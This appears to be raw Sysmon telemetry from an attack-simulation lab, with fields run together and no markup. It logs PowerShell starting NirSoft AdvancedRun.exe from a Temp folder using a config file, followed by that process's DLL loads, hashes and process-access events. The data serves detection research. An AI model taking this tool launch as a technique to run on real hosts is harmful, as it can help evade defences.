Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.020{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.019{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004075230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.018{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.018{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.017{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004075227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.017{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with 
different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004075226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.014{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004075225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.013{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a
4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.A
utomation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004075224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.009{834264DD-1435-61EB-7B08-000000002702}5336C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004074336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:01.536{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 734700x80000000000000004074288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:56.438{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\edputil.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)EDP utilMicrosoft® Windows® Operating SystemMicrosoft CorporationEDPUTIL.DLLMD5=913C76FC95CE8167FAB1E55D697F3B7B,SHA256=9D82F63627DCD5F186CC60A48B412A03DFA8C6FB63426A892A110751966390A7trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004074266Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.443{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074265Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.442{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.441{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.441{834264DD-DB11-61EA-9500-000000002702}4285184C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074260Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.441{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074259Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.439{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.438{834264DD-DB11-61EA-9500-000000002702}4283148C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074257Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.429{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.427{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.421{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.421{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.421{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004074252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.420{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004074241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.229{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:13:54.220{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.118{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.109{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.110{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.110{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.065{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004074151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:13:54.073{834264DD-1402-61EB-7108-000000002702}4236C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft 
